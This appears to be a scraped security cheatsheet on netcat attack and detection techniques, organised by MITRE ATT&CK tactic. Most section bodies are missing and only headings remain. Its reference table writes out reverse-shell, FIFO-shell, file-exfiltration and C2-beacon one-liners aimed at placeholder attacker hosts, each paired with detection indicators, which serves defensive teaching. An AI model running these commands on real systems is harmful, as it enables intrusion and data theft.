Edit

Netcat: Attack & Detection Techniques

Netcat Weaponisation: Attack Techniques & Detection Cheatsheet

Overview

Netcat (nc) is a versatile networking utility that reads and writes data across network connections. Its legitimate uses include debugging, port scanning, and file transfers—but attackers weaponise it for reconnaissance, reverse shells, data exfiltration, and lateral movement. This guide covers offensive techniques mapped to MITRE ATT&CK tactics and comprehensive detection strategies.

Learning Workflow

Phase 1: Foundations — Netcat variants, syntax, and capabilities Phase 2: Reconnaissance — Port scanning, banner grabbing, service enumeration Phase 3: Initial Access — Bind shells, reverse shells, payload delivery Phase 4: Execution — Command execution, script delivery, interactive shells Phase 5: Persistence — Backdoors, scheduled tasks, service creation Phase 6: Privilege Escalation — SUID exploitation, capability abuse Phase 7: Defense Evasion — Encrypted channels, obfuscation, living-off-the-land Phase 8: Credential Access — Credential harvesting, keylogging relay Phase 9: Discovery — Network mapping, service discovery Phase 10: Lateral Movement — Pivoting, proxying, relay attacks Phase 11: Collection — Data staging, clipboard capture Phase 12: Command & Control — C2 channels, beaconing Phase 13: Exfiltration — Data theft, covert channels

Phase 1: Netcat Foundations

Netcat Variants

Variant
Description
Key Features

nc (traditional)

Original BSD netcat

Basic functionality

nc.openbsd

OpenBSD version

No -e flag (security)

nc.traditional

GNU netcat

Includes -e for execution

ncat

Nmap's netcat

SSL/TLS, access control, proxy

socat

Advanced relay

Bidirectional, SSL, PTY

netcat

Generic name

Varies by distribution

busybox nc

Embedded systems

Minimal features

pwncat

Python-based

Persistence, privesc built-in

rustcat

Rust implementation

Modern, evasive

Core Syntax

Identifying Installed Variants

Phase 2: Reconnaissance Detection

Attack Techniques

Port Scanning

Service Fingerprinting

Detection Strategies

Log Indicators

Network Detection

Host-Based Detection

Detection Script

Defensive Measures

Phase 3: Initial Access Detection

Attack Techniques

Bind Shell (Attacker Connects to Victim)

Reverse Shell (Victim Connects to Attacker)

Payload Delivery

Detection Strategies

Log Indicators

Network Detection

Process-Based Detection

Detection Script

Defensive Measures

Phase 4: Execution Detection

Attack Techniques

Remote Command Execution

Interactive Shell Upgrade

Staged Execution

Detection Strategies

Log Indicators

Process Detection

Network Detection

Detection Script

Phase 5: Persistence Detection

Attack Techniques

Cron-Based Persistence

Systemd Service Persistence

Init Script Persistence

Shell Profile Persistence

Binary Replacement Persistence

Detection Strategies

Log Indicators

File System Detection

Detection Script

Auditd Rules for Persistence

Phase 6: Privilege Escalation Detection

Attack Techniques

SUID Netcat Exploitation

Capability Abuse

Exploiting Privileged Processes

Sudo Misconfiguration Exploitation

Detection Strategies

Phase 7: Defense Evasion Detection

Attack Techniques

Process Name Obfuscation

Encrypted Channels

Traffic Obfuscation

Living Off The Land

Log Evasion

Detection Strategies

Obfuscation Detection

Encrypted Channel Detection

Detection Script

Phase 8: Credential Access Detection

Attack Techniques

Credential Harvesting Relay

Keylogger Relay

Password File Exfiltration

Memory Credential Dumping

Detection Strategies

Phase 9: Discovery Detection

Attack Techniques

Network Discovery

Internal Reconnaissance

Detection Strategies

Phase 10: Lateral Movement Detection

Attack Techniques

Pivoting Through Compromised Hosts

Port Forwarding

SOCKS Proxy Creation

File Transfer Laterally

Detection Strategies

Detection Script

Phase 11: Collection Detection

Attack Techniques

Data Staging

Clipboard Capture

Screen Capture

Archive Creation

Detection Strategies

Phase 12: Command & Control Detection

Attack Techniques

Basic C2 Channel

Resilient C2

Encrypted C2

Covert Channels

Detection Strategies

Beaconing Detection

C2 Traffic Analysis

Detection Script

Phase 13: Exfiltration Detection

Attack Techniques

Direct File Exfiltration

Compressed Exfiltration

Chunked Exfiltration

Scheduled Exfiltration

Covert Channel Exfiltration

Detection Strategies

Network Monitoring

File Access Monitoring

Detection Script

Additional Attack Types

Port Knocking with Netcat

Man-in-the-Middle with Netcat

UDP Attacks

Comprehensive Detection Script

Quick Reference Card

Common Attack Patterns

Attack
Command
Detection

Bind Shell

nc -lvp 4444 -e /bin/bash

Listen on unusual ports

Reverse Shell

nc <attacker> 4444 -e /bin/bash

Outbound to unusual ports

FIFO Shell

mkfifo /tmp/f; cat /tmp/f|/bin/bash|nc <ip> 4444 >/tmp/f

Named pipes in /tmp

Port Scan

nc -zv <target> 1-1024

Rapid connection attempts

Banner Grab

nc -v <target> 80

Service enumeration patterns

File Exfil

cat file | nc <attacker> 4444

Large outbound transfers

Relay/Pivot

nc -lvp 8888 | nc <target> 22

Multi-socket processes

C2 Beacon

while true; do nc <c2> 4444 -e /bin/bash; sleep 300; done

Periodic connections

Detection Commands

Task
Command

Find nc processes

ps aux | grep -E '[n]c|[n]etcat|[n]cat'

Find listeners

ss -tunapl | grep LISTEN

Find named pipes

find /tmp -type p

Shell network conn

lsof -i | grep bash

Audit nc execution

ausearch -c nc

Process tree

pstree -p | grep nc

Deleted binaries

ls -la /proc/*/exe | grep deleted

Defensive Rules

Log Locations

Log
Content

/var/log/auth.log

Authentication, sudo

/var/log/syslog

System events

/var/log/audit/audit.log

Auditd events

/var/log/kern.log

Firewall, kernel

journalctl

Systemd logs

MITRE ATT&CK Mapping

Tactic
Technique
Netcat Usage

Reconnaissance

T1046 Network Scanning

nc -zv port scanning

Initial Access

T1059 Command Execution

Reverse/bind shells

Execution

T1059.004 Unix Shell

-e /bin/bash

Persistence

T1053 Scheduled Task

Cron + nc reverse shell

Privilege Escalation

T1548 SUID Abuse

SUID nc binary

Defense Evasion

T1027 Obfuscation

Renamed binaries, SSL

Credential Access

T1003 Credential Dump

Exfil /etc/shadow

Discovery

T1018 Remote Discovery

Banner grabbing

Lateral Movement

T1090 Proxy

Relay/pivot chains

Collection

T1560 Archive

tar + nc exfil

Command & Control

T1571 Non-Standard Port

C2 on 4444, etc.

Exfiltration

T1048 Exfil Over C2

Direct file transfer

PreviousSQLMapNextPowerShell Attack & Detection Techniques

Last updated